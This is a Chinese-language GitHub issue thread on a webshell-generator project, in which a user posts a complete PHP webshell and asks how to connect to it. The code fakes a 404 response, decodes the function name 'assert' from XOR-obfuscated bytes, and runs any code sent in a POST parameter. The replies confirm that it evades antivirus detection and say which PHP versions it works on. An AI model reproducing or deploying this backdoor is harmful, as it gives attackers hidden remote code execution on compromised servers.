### ISSUE TITLE
这个怎么连接

### ISSUE THREAD

**Issue by m1911** [yzddmr6/as_webshell_venom#1]
<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        $_0 = "\xfc" ^ "\x9d";
        $_1 = "\x4" ^ "\x77";
        $_2 = "\xb4" ^ "\xc7";
        $_3 = "\x9b" ^ "\xfe";
        $_4 = "\x93" ^ "\xe1";
        $_5 = "\xe7" ^ "\x93";
        $db =$_0.$_1.$_2.$_3.$_4.$_5;
        return @$db($this->c);
    }
}
$comi = new COMI();
@$comi->c = $_POST['yzddmr6'];
?>

yzddmr6 这个是密码
![11](https://user-images.githubusercontent.com/10194213/60390429-0dcc1400-9b09-11e9-9d88-6eaa45bdfd2d.png)
按照图上 填写了但是 链接报错 还需要 配置哪些地方呢？

**Comment by yzddmr6** [comment]
异或的基础是混淆`assert`这个函数
php7.1以上没有assert了  就不能使用
你看看你的php版本号

**Comment by m1911** [comment]
那个 通杀 只能到 php7 以下  直接 这样 填写个 连接密码就好 其他都不用搞了是吧

**Comment by yzddmr6** [comment]
是  这样  的  免杀  都  已经  给你  做好了
